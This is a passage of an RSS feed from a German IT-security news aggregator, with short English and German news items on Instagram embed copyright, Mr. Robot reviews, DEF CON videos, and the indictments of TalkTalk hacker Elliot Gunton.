<p>The post <a rel="nofollow" href="https://www.helpnetsecurity.com/2020/06/17/biocatch-mark-elliot/">Mark Elliot joins BioCatch as Chief Marketing Officer</a> appeared first on <a rel="nofollow" href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Instagram Just Threw Users of Its Embedding API Under the Bus]]></title>
<description><![CDATA[An anonymous reader quotes a report from Ars Technica: Instagram does not provide users of its embedding API a copyright license to display embedded images on other websites, the company said in a Thursday email to Ars Technica. The announcement could come as an unwelcome surprise to users who be...]]></description>
<link>https://tsecurity.de/de/1138562/it-security-nachrichten/instagram-just-threw-users-of-its-embedding-api-under-the-bus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1138562/it-security-nachrichten/instagram-just-threw-users-of-its-embedding-api-under-the-bus/</guid>
<pubDate>Fri, 05 Jun 2020 06:31:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Ars Technica: Instagram does not provide users of its embedding API a copyright license to display embedded images on other websites, the company said in a Thursday email to Ars Technica. The announcement could come as an unwelcome surprise to users who believed that embedding images, rather than hosting them directly, provides insulation against copyright claims. "While our terms allow us to grant a sub-license, we do not grant one for our embeds API," a Facebook company spokesperson told Ars in a Thursday email. "Our platform policies require third parties to have the necessary rights from applicable rights holders. This includes ensuring they have a license to share this content, if a license is required by law."
 
In plain English, before you embed someone's Instagram post on your website, you may need to ask the poster for a separate license to the images in the post. If you don't, you could be subject to a copyright lawsuit. Professional photographers are likely to cheer the decision, since it will strengthen their hand in negotiations with publishers. But it could also significantly change the culture of the Web. Until now, people have generally felt free to embed Instagram posts on their own sites without worrying about copyright concerns. That might be about to change. Instagram's announcement follows a recent court ruling where photographer Elliot McGucken sued Newsweek for copyright infringement for embedding his post on their site without permission. "Newsweek countered that it didn't need McGucken's permission because it could get rights indirectly via Instagram," reports Ars Technica. "Instagram's terms of service require anyone uploading photos to provide a copyright license to Instagram -- including the right to sublicense the same rights to other users. Newsweek argued that that license extends to users of Instagram's embedding technology, like Newsweek."
 
"But in a surprise ruling (PDF) on Monday, Judge Katherine Failla refused to dismiss McGucken's lawsuit at a preliminary stage," the report adds. "She held that there wasn't enough evidence in the record to decide whether Instagram's terms of service provided a copyright license for embedded photos."
 
The report goes on to note that courts have previously "ruled against plaintiffs in embedding cases based on the 'server test,' which holds that liability goes to whomever runs the server that actually delivers infringing content to the user -- in this case, Instagram." It adds: "Instagram's decision to throw users of its embedding API under the bus makes the server test crucial for cases like this."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Instagram+Just+Threw+Users+of+Its+Embedding+API+Under+the+Bus%3A+https%3A%2F%2Fbit.ly%2F2MsOig7"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F20%2F06%2F04%2F2341201%2Finstagram-just-threw-users-of-its-embedding-api-under-the-bus%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/20/06/04/2341201/instagram-just-threw-users-of-its-embedding-api-under-the-bus?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s How Aarogya Setu App Handles Your Location Data]]></title>
<description><![CDATA[India’s homegrown contact tracing app for Coronavirus, dubbed Aarogya Setu, has been under scrutiny due to many security and privacy concerns. Popular French hacker Elliot Anderson, known for exposing flaws in the Aadhar app, recently pointed out that a security flaw in the Aarogya Setu app jeopa...]]></description>
<link>https://tsecurity.de/de/1109444/linux-tipps/heres-how-aarogya-setu-app-handles-your-location-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1109444/linux-tipps/heres-how-aarogya-setu-app-handles-your-location-data/</guid>
<pubDate>Thu, 07 May 2020 14:45:08 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>India’s homegrown contact tracing app for Coronavirus, dubbed Aarogya Setu, has been under scrutiny due to many security and privacy concerns. Popular French hacker Elliot Anderson, known for exposing flaws in the Aadhar app, recently pointed out that a security flaw in the Aarogya Setu app jeopardizes the health data of 90 million Indians. After his initial tweet, Indian […]</p>
<p>The post <a rel="nofollow" href="https://fossbytes.com/how-aarogya-setu-app-handles-location-data/">Here’s How Aarogya Setu App Handles Your Location Data</a> appeared first on <a rel="nofollow" href="https://fossbytes.com/">Fossbytes</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[&quot;Law &amp; Order - SVU&quot;-Spin-off: Christopher Meloni kehrt als Elliot Stabler zurück]]></title>
<description><![CDATA[Der "Law & Order: SVU"-Charakter Elliot Stabler kehrt zurück! Schauspieler Christopher Meloni wird jedoch nicht in der Serie auftreten, sondern bekommt ein eigenes Spin-off. Was bisher zur Ablegerserie bekannt ist, erfahrt ihr bei uns.
																					Dieser Artikel wurde einsortiert unter 
...]]></description>
<link>https://tsecurity.de/de/1071753/it-nachrichten/quotlaw-amp-order-svuquot-spin-off-christopher-meloni-kehrt-als-elliot-stabler-zurueck/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1071753/it-nachrichten/quotlaw-amp-order-svuquot-spin-off-christopher-meloni-kehrt-als-elliot-stabler-zurueck/</guid>
<pubDate>Wed, 01 Apr 2020 09:47:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der "Law &amp; Order: SVU"-Charakter Elliot Stabler kehrt zurück! Schauspieler Christopher Meloni wird jedoch nicht in der Serie auftreten, sondern bekommt ein eigenes Spin-off. Was bisher zur Ablegerserie bekannt ist, erfahrt ihr bei uns.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/tv-sender/vox.html">VOX</a>,																	<a href="https://www.netzwelt.de/tv-sender/13th-street.html">13th Street</a>,																	<a href="https://www.netzwelt.de/tv-sender/rtl-nitro.html">NITRO</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/nbc.html">NBC</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/law--order-special-victims-unit/index.html">"Law &amp; Order: Special Victims Unit": Alle Infos und News zur Serie!</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=jTuqH5JY_3Y:dlUhhta0BWs:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/netzwelt/~4/jTuqH5JY_3Y" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[TikTok is 'Fundamentally Parasitic', Says Reddit CEO]]></title>
<description><![CDATA[TikTok is one of the hottest social media platforms but the CEO of Reddit had some harsh words for the popular app, calling it "fundamentally parasitic" at an event this week. From a report: The comments from Reddit CEO and co-founder Steve Huffman were some of the more controversial offered up d...]]></description>
<link>https://tsecurity.de/de/1036038/it-security-nachrichten/tiktok-is-fundamentally-parasitic-says-reddit-ceo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1036038/it-security-nachrichten/tiktok-is-fundamentally-parasitic-says-reddit-ceo/</guid>
<pubDate>Thu, 27 Feb 2020 15:31:43 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[TikTok is one of the hottest social media platforms but the CEO of Reddit had some harsh words for the popular app, calling it "fundamentally parasitic" at an event this week. From a report: The comments from Reddit CEO and co-founder Steve Huffman were some of the more controversial offered up during a panel discussion with former public policy executive Elliot Schrage and former Facebook VP of Product Sam Lessin. During a brief conversation about the feature innovations of TikTok, Huffman pushed back hard on the notion that Silicon Valley startups had something to learn from the app. "Maybe I'm going to regret this, but I can't even get to that level of thinking with them," Huffman said. "Because I look at that app as so fundamentally parasitic, that it's always listening, the fingerprinting technology they use is truly terrifying, and I could not bring myself to install an app like that on my phone. I actively tell people, 'Don't install that spyware on your phone,'" he later added. Worth mentioning: Reddit is heavily backed by Chinese tech giant Tencent, which competes aggressively with TikTok's parent firm ByteDance.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=TikTok+is+'Fundamentally+Parasitic'%2C+Says+Reddit+CEO%3A+http%3A%2F%2Fbit.ly%2F2w5Ywhr"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F20%2F02%2F27%2F145232%2Ftiktok-is-fundamentally-parasitic-says-reddit-ceo%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/20/02/27/145232/tiktok-is-fundamentally-parasitic-says-reddit-ceo?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Edge Could Get Color Themes Improvements, More Transparency]]></title>
<description><![CDATA[The Chromium-based Microsoft Edge browser is now available for download, and since the stable version has finally shipped, Microsoft can now focus on improving the overall experience going forward.

One key focus for the software giant is the design of the browser, and the company says it’s close...]]></description>
<link>https://tsecurity.de/de/997501/it-security-nachrichten/microsoft-edge-could-get-color-themes-improvements-more-transparency/</link>
<guid isPermaLink="true">https://tsecurity.de/de/997501/it-security-nachrichten/microsoft-edge-could-get-color-themes-improvements-more-transparency/</guid>
<pubDate>Sun, 19 Jan 2020 10:16:25 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Chromium-based Microsoft Edge browser is now available for download, and since the stable version has finally shipped, Microsoft can now focus on improving the overall experience going forward.

One key focus for the software giant is the design of the browser, and the company says it’s closely analyzing user feedback to determine which areas need further refinement and which don’t.

In a post on the Microsoft Edge forums, Elliot Kirk, senior software development engineer at Microsoft, explains that the company has grouped the existing feedback into several categories that it will continue to monitor in the near future.

One of them concerns “the ability to add distinct color or color themes to the main browser interface,” as Kirk notes. Microsoft is expected to do more work in this regard to further enhance browser customization, in ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Domo Arigato, Mr. Robot!]]></title>
<description><![CDATA[Wie im Achtziger-Klassiker Mr. Roboto von Styx hat auch Elliot in Mr. Robot Geheimnisse. Die Dramaserie um den Hacker ist nicht nur wegen Rami ...]]></description>
<link>https://tsecurity.de/de/984422/hacking/domo-arigato-mr-robot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/984422/hacking/domo-arigato-mr-robot/</guid>
<pubDate>Mon, 06 Jan 2020 17:15:31 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wie im Achtziger-Klassiker Mr. Roboto von Styx hat auch Elliot in Mr. Robot Geheimnisse. Die Dramaserie um den <b>Hacker</b> ist nicht nur wegen Rami ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr. Robot rezensiert: Domo Arigato, Mr. Robot!]]></title>
<description><![CDATA[Wie im Achtziger-Klassiker Mr. Roboto von Styx hat auch Elliot in Mr. Robot Geheimnisse. Die Dramaserie um den Hacker ist nicht nur wegen Rami Malek grandios. Sie hat einen ganz eigenen beeindruckenden visuellen Stil und zeigt Hacking, wie es wirklich ist. Wir blicken nach dem Serienfinale zurück...]]></description>
<link>https://tsecurity.de/de/983922/it-security-nachrichten/mr-robot-rezensiert-domo-arigato-mr-robot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/983922/it-security-nachrichten/mr-robot-rezensiert-domo-arigato-mr-robot/</guid>
<pubDate>Mon, 06 Jan 2020 09:46:34 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wie im Achtziger-Klassiker Mr. Roboto von Styx hat auch Elliot in Mr. Robot Geheimnisse. Die Dramaserie um den Hacker ist nicht nur wegen Rami Malek grandios. Sie hat einen ganz eigenen beeindruckenden visuellen Stil und zeigt Hacking, wie es wirklich ist. Wir blicken nach dem Serienfinale zurück. (<a href="https://www.golem.de/specials/hacker/">Hacker</a>, <a href="https://www.golem.de/specials/malware/">Malware</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=145838&amp;page=1&amp;ts=1578297960" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Art Imitates Life: Lessons from the Final Season of Mr. Robot]]></title>
<description><![CDATA[Unlike Elliot, real-world adversaries don’t have lofty ideals nor do they suffer crises of conscience.]]></description>
<link>https://tsecurity.de/de/912148/it-security-nachrichten/art-imitates-life-lessons-from-the-final-season-of-mr-robot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/912148/it-security-nachrichten/art-imitates-life-lessons-from-the-final-season-of-mr-robot/</guid>
<pubDate>Fri, 08 Nov 2019 20:01:42 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unlike Elliot, real-world adversaries don’t have lofty ideals nor do they suffer crises of conscience.]]></content:encoded>
</item>
<item>
<title><![CDATA[DEF CON 21 Early Release Video on YouTube!]]></title>
<description><![CDATA[We've posted a few tasty morsels of early release video for you on the DEF CON YouTube Channel! You can absorb Zoz's talk on Hacking Driverless Vehicles, Mudge's anecdotes of being a hacker inside the government, and Melissa Elliot's research on unintentional radio emissions! Enjoy!]]></description>
<link>https://tsecurity.de/de/901047/hacking/def-con-21-early-release-video-on-youtube/</link>
<guid isPermaLink="true">https://tsecurity.de/de/901047/hacking/def-con-21-early-release-video-on-youtube/</guid>
<pubDate>Fri, 25 Oct 2019 05:30:37 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We've posted a few tasty morsels of early release video for you on the <a href="https://www.youtube.com/DEFCONConference/">DEF CON YouTube Channel</a>! You can absorb Zoz's talk on Hacking Driverless Vehicles, Mudge's anecdotes of being a hacker inside the government, and Melissa Elliot's research on unintentional radio emissions! Enjoy!]]></content:encoded>
</item>
<item>
<title><![CDATA[23 Packet Hacking Village talks from DEF CON 23, now on Youtube!]]></title>
<description><![CDATA[Another DEF CON 23 video update: twenty-three (!) videos from the Packet Hacking Village. The talks there covered a huge amount of ground and drew a big crowd throughout the conference. This is a good chance to catch up on the doings of a DEF CON Village that’s already bigger than some of the ear...]]></description>
<link>https://tsecurity.de/de/900835/hacking/23-packet-hacking-village-talks-from-def-con-23-now-on-youtube/</link>
<guid isPermaLink="true">https://tsecurity.de/de/900835/hacking/23-packet-hacking-village-talks-from-def-con-23-now-on-youtube/</guid>
<pubDate>Fri, 25 Oct 2019 05:30:36 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://www.defcon.org/images/defcon-main/post-images/packet23.jpg" alt="Packet Hacking Village image"><p>Another DEF CON 23 video update: <a href="https://www.youtube.com/playlist?list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">twenty-three (!) videos from the Packet Hacking Village</a>. The talks there covered a huge amount of ground and drew a big crowd throughout the conference. This is a good chance to catch up on the doings of a DEF CON Village that’s already bigger than some of the early DEF CONs and still growing. Check out the presentations, share freely and stay tuned. So much more to come!</p>

<p>Included presentations:<br><a href="https://www.youtube.com/watch?v=lPsK_1Bi4dM&amp;index=1&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Wayne Crowder - Fishing to Phishing</a><br><a href="https://www.youtube.com/watch?v=4yHko5upDSQ&amp;index=2&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Vivek Ramachandran - 80211 Monitoring with PCAP2XML</a><br><a href="https://www.youtube.com/watch?v=sh9ROo4OKsk&amp;index=3&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Tony Martin - From XSS to Root on Your NAS</a><br><a href="https://www.youtube.com/watch?v=2cQRSPFSY-s&amp;index=4&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Theodora Titonis - How Machine Learning Finds Malware</a><br><a href="https://www.youtube.com/watch?v=JJr6hxcOB1Y&amp;index=5&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Sam Bowne - Is Your Android App Secure?</a><br><a href="https://www.youtube.com/watch?v=4e-ENa1ygC0&amp;index=6&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Robert Simmons - The Digital Cockroach Bait Station</a><br><a href="https://www.youtube.com/watch?v=ab3gjFkUa1A&amp;index=7&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Ron Taylor - Violating Web Services</a><br><a href="https://www.youtube.com/watch?v=yb_KxMA2w2I&amp;index=8&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Paul Vixie - Passive DNS Collection and Analysis</a><br><a href="https://www.youtube.com/watch?v=kBBhlhLqBjQ&amp;index=9&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Mike Raggo - Remaining Covert in an Overt World</a><br><a href="https://www.youtube.com/watch?v=63zB7nCnqU0&amp;index=10&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Ming Chow - Tools and Techniques Used at the Wall of Sheep</a><br><a href="https://www.youtube.com/watch?v=yAzULqBllXc&amp;index=11&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Monzy Merza - Real World Automation for Rapid Response</a><br><a href="https://www.youtube.com/watch?v=PezFo2Y1BUA&amp;index=12&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Nikhil Mittal - Powershell for Penetration Testers</a><br><a href="https://www.youtube.com/watch?v=_yd2rzd9494&amp;index=13&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Jay Beale - Jailing Programs via Docker</a><br><a href="https://www.youtube.com/watch?v=SvQi6bkm-5A&amp;index=14&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Joseph Muniz and Aamir Lakhani - Pen Testing with Raspberry Pi</a><br><a href="https://www.youtube.com/watch?v=4vPptUmyv4U&amp;index=15&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Karl Koscher - Sniffing SCADA</a><br><a href="https://www.youtube.com/watch?v=r_qViQBX7jE&amp;index=16&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Leon Ward - The Packets Made Me Do It - Using OpenFPC</a><br><a href="https://www.youtube.com/watch?v=W7gSE7msPiU&amp;index=17&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Lokesh Pidawekar - Hackers Practice Ground</a><br><a href="https://www.youtube.com/watch?v=nnRo-sCnLas&amp;index=18&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Mike Raggo - Mobile Data Loss - Threats and Countermeasures</a><br><a href="https://www.youtube.com/watch?v=bImHBLFrrdc&amp;index=19&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Bob Simpson - MITM 101 - Easy Traffic Interception Techniques</a><br><a href="https://www.youtube.com/watch?v=0eRkQOlFn50&amp;index=20&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Brian Wohlwunder and Andrew Beard - I See You</a><br><a href="https://www.youtube.com/watch?v=HC1ychmVdA4&amp;index=21&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">David Schwartzberg - Hacking the Next Generation</a><br><a href="https://www.youtube.com/watch?v=rjd-r4WA0PU&amp;index=22&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Elliot Brink - Global Honeypot Trends</a><br><a href="https://www.youtube.com/watch?v=ZUp6uOkHIcI&amp;index=23&amp;list=PL9fPq3eQfaaDDVPJi9-HmMvknZrVwKSOf">Grecs - Creating REAL Threat Intelligence with Evernote</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[HACKED by DEF CON and MR. ROBOT]]></title>
<description><![CDATA[Important reminder for everyone in the general vicinity of New York City this weekend: 'HACKED by DEF CON and MR. ROBOT' is happening at the TriBeCa Film Festival and you owe it to yourself to check it out.

                        Some of our famous DEF CON Villages (Lockpicking, Privacy, Hardwa...]]></description>
<link>https://tsecurity.de/de/900791/hacking/hacked-by-def-con-and-mr-robot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/900791/hacking/hacked-by-def-con-and-mr-robot/</guid>
<pubDate>Fri, 25 Oct 2019 05:30:35 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<p><img src="https://www.defcon.org/images/defcon-main/post-images/tribeca2016.jpg" alt="DEF CON 2016 tribeca film festival image"></p>

<p>Important reminder for everyone in the general vicinity of New York City this weekend: <strong>'HACKED by DEF CON and MR. ROBOT'</strong> is happening at the <strong>TriBeCa Film Festival and you owe it to yourself to check it out</strong>.</p>

                        <p>Some of our famous DEF CON Villages (Lockpicking, Privacy, Hardware Hacking and BioHacking) will be on hand to share hands-on instruction, group presentations and even some fun contests.</p>

                        <p>Hosted by the team behind USA Network's breakout hit 'MR. ROBOT', there's an fSociety recruitment challenge. Test your hacking/social engineering/knowledge skills to see if you have the goods to join Elliot in fsociety.</p>

                        <p>There will also be panel discussions all three days:</p>

                                <p>Friday, 4/15 @8pm: <strong>Emergent Technologies: Hacking Innovation</strong> <br>
                                Panelists: Joshua Carr, Sarah Grant, Tal Danino<br>
                                Moderated by DEF CON</p>

                                <p>Saturday, 4/16 @7pm: <strong>Perception: The Art of Surveillance</strong><br>
                                Panelists: Alexis McGill Johnson, Lyric Cabral, Laura Poitras(TBC)<br>
                                Moderated by DEF CON</p>

                                <p>Sunday, 4/17 @1pm: <strong>Living in a Post MR. ROBOT World</strong><br>
                                Panelists: Kor Adana, Writer and Cast Members of MR. ROBOT<br>
                                Moderated by The Dark Tangent</p>

                                <p>All this is going down at Spring Studios at 50 Varick Street, and door open at noon. You can get more info and ticket details at <a href="https://tribecafilm.com/festival/defcon">https://tribecafilm.com/festival/defcon</a></p>

                                <p>Come check out all the DEF CON and MR. ROBOT goodness at the world-renowned TriBeCa Film Festival. Super-fun brain-embiggening times await.</p> 

                                <p>They have some movies there too.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[
Cyber-Mythen aus Film und Fernsehen]]></title>
<description><![CDATA[Panda Security unterzieht die Serie Mr. Robot, den Filmklassiker Das Netz ... In der Amazon-Serie Mr. Robot verschafft sich das Cyber-Genie Elliot ...]]></description>
<link>https://tsecurity.de/de/890058/it-security-nachrichten/cyber-mythen-aus-film-und-fernsehen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/890058/it-security-nachrichten/cyber-mythen-aus-film-und-fernsehen/</guid>
<pubDate>Sat, 12 Oct 2019 07:01:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Panda <b>Security</b> unterzieht die Serie Mr. Robot, den Filmklassiker Das Netz ... In der Amazon-Serie Mr. Robot verschafft sich das <b>Cyber</b>-Genie Elliot ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Thanks-thanks to TalkTalk teen hacker: UK cops' first auction of ill-gotten Bitcoin nets £240k]]></title>
<description><![CDATA[Cryptocoin from selling hacking services, ppldeets online helps fund crimefighters British cops have raised £240,000 in their first ever UK-based auction of cryptocurrencies understood to have been seized from former TalkTalk hacker Elliot Gunton , who'd "earned" it selling hacking services and f...]]></description>
<link>https://tsecurity.de/de/879969/it-security-nachrichten/thanks-thanks-to-talktalk-teen-hacker-uk-cops-first-auction-of-ill-gotten-bitcoin-nets-240k/</link>
<guid isPermaLink="true">https://tsecurity.de/de/879969/it-security-nachrichten/thanks-thanks-to-talktalk-teen-hacker-uk-cops-first-auction-of-ill-gotten-bitcoin-nets-240k/</guid>
<pubDate>Mon, 30 Sep 2019 17:31:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<h4>Cryptocoin from selling hacking services, ppldeets online helps fund crimefighters</h4> <p>British cops have raised £240,000 in their first ever UK-based auction of cryptocurrencies understood to have been seized from <a target="_blank" href="https://www.theregister.co.uk/2019/08/19/elliott_gunton_400k_repay_instagram_hacking_telstra/">former TalkTalk hacker Elliot Gunton</a> , who'd "earned" it selling hacking services and <a target="_blank" href="https://www.theregister.co.uk/2019/04/03/elliott_gunton_denies_instagram_login_sales_bitcoin/">flogging people's stolen personal details</a> online.…</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[One of the hackers behind EtherDelta hack also involved in TalkTalk hack]]></title>
<description><![CDATA[US authorities have indicted two men for hacking the exchange EtherDelta in December 2017, one of them was also accused of TalkTalk hack. US authorities have indicted two men, Elliot Gunton and Anthony Tyler Nashatka, for hacking the cryptocurrency exchange EtherDelta in 2017. In December 2017, t...]]></description>
<link>https://tsecurity.de/de/872909/hacking/one-of-the-hackers-behind-etherdelta-hack-also-involved-in-talktalk-hack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/872909/hacking/one-of-the-hackers-behind-etherdelta-hack-also-involved-in-talktalk-hack/</guid>
<pubDate>Sat, 21 Sep 2019 17:30:29 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<p>US authorities have indicted two men for hacking the exchange EtherDelta in December 2017, one of them was also accused of TalkTalk hack. US authorities have indicted two men, Elliot Gunton and Anthony Tyler Nashatka, for hacking the cryptocurrency exchange EtherDelta in 2017. In December 2017, the popular cryptocurrency exchange EtherDelta was hacked, attackers conducted […]</p>
<p>The post <a rel="nofollow" href="https://securityaffairs.co/wordpress/91548/cyber-crime/talktalk-hacker-behind-etherdelta-hack.html">One of the hackers behind EtherDelta hack also involved in TalkTalk hack</a> appeared first on <a rel="nofollow" href="https://securityaffairs.co/wordpress">Security Affairs</a>.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Exclusive: TalkTalk hacker also breached EtherDelta cryptocurrency exchange]]></title>
<description><![CDATA[Elliot Gunton and Anthony Tyler Nashatka charged for 2015 EtherDelta hack.]]></description>
<link>https://tsecurity.de/de/872399/it-security-nachrichten/exclusive-talktalk-hacker-also-breached-etherdelta-cryptocurrency-exchange/</link>
<guid isPermaLink="true">https://tsecurity.de/de/872399/it-security-nachrichten/exclusive-talktalk-hacker-also-breached-etherdelta-cryptocurrency-exchange/</guid>
<pubDate>Fri, 20 Sep 2019 19:31:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elliot Gunton and Anthony Tyler Nashatka charged for 2015 EtherDelta hack.]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon Prime Video: Die finale Staffel von Mr. Robot kommt ab Oktober 2019]]></title>
<description><![CDATA[Wie geht die Geschichte um den Hacker Elliot, der Evil Corp. und Mr. Robot aus? Ab Oktober können es Fans der Serie in der finalen Staffel erfahren. In den 13 Episoden sind auch wieder Rami Malek und Christian Slater zu sehen. (Prime Video, Amazon)]]></description>
<link>https://tsecurity.de/de/854991/it-security-nachrichten/amazon-prime-video-die-finale-staffel-von-mr-robot-kommt-ab-oktober-2019/</link>
<guid isPermaLink="true">https://tsecurity.de/de/854991/it-security-nachrichten/amazon-prime-video-die-finale-staffel-von-mr-robot-kommt-ab-oktober-2019/</guid>
<pubDate>Sat, 31 Aug 2019 12:31:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wie geht die Geschichte um den Hacker Elliot, der Evil Corp. und Mr. Robot aus? Ab Oktober können es Fans der Serie in der finalen Staffel erfahren. In den 13 Episoden sind auch wieder Rami Malek und Christian Slater zu sehen. (<a href="https://www.golem.de/specials/amazon-prime-video/">Prime Video</a>, <a href="https://www.golem.de/specials/amazon/">Amazon</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=143552&amp;page=1&amp;ts=1567246980" alt="" width="1" height="1">
]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr. Robot Hacks: How Elliot Hacked the Prison]]></title>
<description><![CDATA[Welcome back, my rookie hackers!In Season 1 Episode 6 Elliot is being blackmailed by the ruthless and unrelenting drug dealer, Vera, to hack him out of jail. He is holding Elliot's new love interest, Shayla, hostage and has given Elliot until midnight to hack the jail's computer system in order t...]]></description>
<link>https://tsecurity.de/de/839929/it-security-nachrichten/mr-robot-hacks-how-elliot-hacked-the-prison/</link>
<guid isPermaLink="true">https://tsecurity.de/de/839929/it-security-nachrichten/mr-robot-hacks-how-elliot-hacked-the-prison/</guid>
<pubDate>Wed, 28 Aug 2019 07:32:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
